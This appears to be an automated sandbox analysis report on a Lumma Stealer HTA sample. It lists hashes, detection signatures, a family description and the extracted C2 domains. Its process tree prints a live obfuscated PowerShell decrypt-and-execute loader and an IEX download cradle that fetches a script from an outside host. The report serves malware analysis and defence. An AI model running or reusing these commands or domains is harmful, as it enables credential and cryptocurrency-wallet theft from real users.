Edit tour
Windows
Analysis Report
re5.mp4.hta
Overview
General Information
| Sample name: | re5.mp4.hta |
| Analysis ID: | 1582681 |
| MD5: | 5697159735d484d2d4fff3ef06aa6f62 |
| SHA1: | 98d8b2509628ab131345992f2d43241913d12557 |
| SHA256: | 3098a9c50afcd478c3eeb9b12b3794109c0f3652263bcaf8b0077c413188e4da |
| Tags: | htaLummaStealeruser-lontze7 |
| Infos: |   |
 | |
Detection
LummaC
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell Download and Execute IEX
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Download and Execute Pattern
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
mshta.exe (PID: 764 cmdline: mshta.exe "C:\Users\ user\Deskt op\re5.mp4 .hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) 
powershell.exe (PID: 4524 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -w 1 -ep U nrestricte d -nop fun ction RofJ g($zkfZU){ return -sp lit ($zkfZ U -replace '..', '0x $& ')};$xH Ko = RofJg ('ADDABD85 2CBF669FB6 1EACB84993 EA3F154802 630095EC46 064205C3E2 58CA0A3F84 6939344DFE ADF3B7AC1A 3089265AAE ECAAD45D03 57AA9B08B6 C103541454 A7CFA4167A 71B0010AA6 E212385CA6 41B9965828 2EE9B9F894 A6F9BE8822 79D7E4F19B DCA0261AA7 9FC5FAD99F B022F74600 1AACC2A620 50F3C5F1AC B5DBCECEEC FE3A7A31A8 937A5F6585 1F4C54937E AC4F795E29 8C92142248 43FB4F9B13 B0ABEA024C F9052242B6 5816163BD5 11BDD6A30B 7FD935D931 026CD618E7 CF54E77A0A 14C23FC0A2 197A0626BC CD85128A5B 13D7573F97 FA06919B49 E60B6F135A 7B0087E73B EDF1BBD8EF 749346E35B B5B8EF328A B42653A8C4 23CCE65ED7 51D8FDB753 8347B1115C 64B27CB0B6 63FD5D314E F76EA571A2 66B7DA4A5F EDC4A11881 B74E43E450 CB442B4DCF 5E7F4D3F96 4B91DD28FD 3C9CC2CA26 9708977893 826BC4F817 CA3F24A1E2 5FD45FEE31 E6F57DD231 764A7ED8EC 4F27A85D3E 63955F8A0D 8233AF72C4 E3B87AC790 739B96882A AE6D9C087F DE03390064 89DE3CCC11 1FF2BE081E FD92E3486D C8FA48F7C6 4E97265982 A18F79B58A 14B1B7F4E6 18D3E23C9A 3C802554F0 5AB3FACFC5 92E6C0A13C 4FCD3AC9EB 67201312B3 05EABAA5BD 1661FB4D01 209CD81474 27069DCB7C 70B3FC1669 E3D643A74B 2F009A73FF 4ECAF1E92F B68F73506E 4E251F8603 CB128405A1 2B13D51EB2 8D67D15225 4C24F1B1B1 B208470E50 C7C6A293ED 2B9BC672E7 167C873D37 9DDA70928E 34D5D92B01 E6FBEF93CF F4C5A2A47F EC851643D3 8DAC71CC97 DE03EF89C8 4EC82B4DAE C32416113C 18A4F97176 E6C6F19529 DFC27FEDF7 6EAECC83B6 5CDB18F573 A47CA511AB B57C0E2FB2 71F43F876C 7E4EBB6708 21DEE11F27 961708ECC5 A51060AB34 3764D0D66A 8F570DE516 85313E5643 F216ABA89A 781C9437C8 360BDD168A 4F24CC7EED BAF8CB939B 2CD2368951 45BEE8327E 515C72C6E3 F8945F6B99 DD6856D6B8 5A39A9636E F180D230B2 6C5E84DE8C 40A71AE0F1 B4C4B3ABEE 23B5B26FF4 0AC1D252C8 9C4C40A58E 6456EBA4F5 FBFC23');$ Hubqy=-joi n [char[]] (([Securit y.Cryptogr aphy.Aes]: :Create()) .CreateDec ryptor((Ro fJg('446D6 76A5759414 3656355477 4726D56')) ,[byte[]]: :new(16)). TransformF inalBlock( $xHKo,0,$x HKo.Length )); & $Hub qy.Substri ng(0,3) $H ubqy.Subst ring(129) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
conhost.exe (PID: 6432 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 616 cmdline:
"C:\Window s\SysWow64 \WindowsPo werShell\v 1.0\powers hell.exe" -NoProfile -Executio nPolicy By pass -Comm and & {IEX ((New-Obj ect Net.We bClient).D ownloadStr ing('https ://t1.awag ama2.org/S cheele.pt' ))} MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 6648 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 3836 cmdline:
"C:\Window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - powershell.exe (PID: 6388 cmdline:
powershell -exec byp ass MZP MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 6160 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution |
{"C2 url": ["appliacnesot.buzz", "scentniej.buzz", "inherineau.buzz", "screwamusresz.buzz", "hummskitnj.buzz", "rebuildeso.buzz", "prisonyfork.buzz", "cashfuzysao.buzz", "permissiblene.click"], "Build id": "yJaNLj--re5"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | ||
| JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security | ||
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
| Click to see the 2 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||